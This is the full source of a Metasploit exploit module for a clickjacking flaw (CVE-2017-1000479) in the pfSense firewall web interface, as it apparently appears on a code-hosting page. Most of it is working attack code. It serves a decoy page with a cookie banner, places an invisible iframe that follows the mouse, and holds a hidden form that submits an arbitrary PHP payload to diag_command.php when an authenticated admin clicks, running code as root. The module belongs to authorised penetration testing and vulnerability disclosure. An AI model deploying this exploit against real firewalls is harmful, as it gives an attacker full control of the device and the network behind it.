Path: blob/master/modules/exploits/unix/http/pfsense_clickjacking.rb
19611 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::HttpServer::HTML910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Clickjacking Vulnerability In CSRF Error Page pfSense',15'Description' => %q{16This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.1718pfSense is a free and open source firewall and router. It was found that the19pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin20into interacting with a specially crafted webpage it is possible for an attacker21to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user,22this will result in a full compromise of the pfSense instance.23},24'Author' => 'Yorick Koster',25'Payload' => { 'BadChars' => '"' },26'License' => MSF_LICENSE,27'References' => [28['CVE', '2017-1000479'],29['URL', 'https://securify.nl/en/advisory/SFY20171101/clickjacking-vulnerability-in-csrf-error-page-pfsense.html'],30['URL', 'https://doc.pfsense.org/index.php/2.4.2_New_Features_and_Changes']31],32'DefaultOptions' => {33'EXITFUNC' => 'process'34},35'Arch' => ARCH_PHP,36'Platform' => 'php',37'Targets' => [38[ 'pfSense <= 2.4.1', { 'auto' => false } ]39],40'DefaultTarget' => 0,41'DisclosureDate' => '2017-11-21',42'Notes' => {43'Reliability' => UNKNOWN_RELIABILITY,44'Stability' => UNKNOWN_STABILITY,45'SideEffects' => UNKNOWN_SIDE_EFFECTS46}47)48)4950register_options(51[52OptString.new('TARGETURI', [true, 'The base path to the web application', 'https://192.168.1.1'])53]54)55end5657def js_file58@js ||= lambda {59path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.js')60return File.read(path)61}.call62end6364def css_file65@css ||= lambda {66path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.css')67return File.read(path)68}.call69end7071def background_file72@background ||= lambda {73path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'background.jpg')74return File.read(path)75}.call76end7778def on_request_uri(cli, request)79print_status("GET #{request.uri} #{request.headers['User-Agent']}")8081resp = create_response(200, "OK")82if request.uri =~ /\.js$/83resp.body = js_file84resp['Content-Type'] = 'text/javascript'8586elsif request.uri =~ /\.css$/87resp.body = css_file88resp['Content-Type'] = 'text/css'8990elsif request.uri =~ /\.jpg$/91resp.body = background_file92resp['Content-Type'] = 'image/jpg'9394else95if datastore['TARGETURI'].end_with? '/'96url = datastore['TARGETURI'] + 'diag_command.php'97else98url = datastore['TARGETURI'] + '/diag_command.php'99end100framename = rand_text_alpha(16)101divname = rand_text_alpha(16)102resp.body = %Q|<!DOCTYPE html>103<html>104<meta charset="utf-8">105<link rel="stylesheet" type="text/css" href="#{get_resource.chomp('/')}/cookieconsent.min.css" />106<script src="#{get_resource.chomp('/')}/cookieconsent.min.js"></script>107<script>108window.addEventListener("load", function(){109window.cookieconsent.initialise({110"palette": {111"popup": {112"background": "#000",113"text": "#0f0"114},115"button": {116"background": "#0f0"117}118},119"position": "top",120"static": true121});122});123</script>124<script>125document.cookie = 'cookieconsent_status=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';126window.addEventListener('load', function(){127document.forms[0].post.click();128document.onmousemove = function(e) {129var e = e \|\| window.event;130var s = document.getElementById('#{divname}');131s.style.left = (e.clientX - 10) + 'px';132s.style.top = (e.clientY - 5) + 'px';133};134});135</script>136<body style="background-image:url(#{get_resource.chomp('/')}/background.jpg);background-size:cover;">137<div id="#{divname}" style="position:absolute;z-index:10;border:none;width:20px;height:10px;overflow:hidden;opacity:0.0;">138<iframe src="about:blank" name="#{framename}" sandbox="allow-forms" border="no" scrolling="no" width="800" height="800" style="width:400px;height:800px;margin-top:-70px;margin-left:-40px;"></iframe>139</div>140<div style="display:none">141<form action="#{url}" method="POST" enctype="multipart/form-data" target="#{framename}">142<input type="hidden" name="txtPHPCommand" value="#{payload.encoded}" />143<input type="hidden" name="submit" value="EXECPHP" />144<input type="submit" name="post"/>145</form>146</div>147</body>148</html>149|150resp['Content-Type'] = 'text/html'151end152153cli.send_response(resp)154end155end156157158